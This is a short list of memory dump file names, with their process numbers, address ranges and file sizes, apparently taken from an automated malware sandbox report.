memory/3600-462-0x00000000004A0000-0x00000000004A1000-memory.dmpFilesize
4KB
-
memory/3600-465-0x000000001C040000-0x000000001C042000-memory.dmpFilesize
8KB
-
memory/3604-288-0x0000000000000000-mapping.dmp
-
memory/3804-282-0x0000000000000000-mapping.dmp
-
memory/3860-449-0x0000000000000000-mapping.dmp
-
memory/3956-450-0x0000000000000000-mapping.dmp
-
memory/3956-457-0x000000001CAD0000-0x000000001CAD2000-memory.dmpFilesize
8KB
-
memory/4040-274-0x0000000000000000-mapping.dmp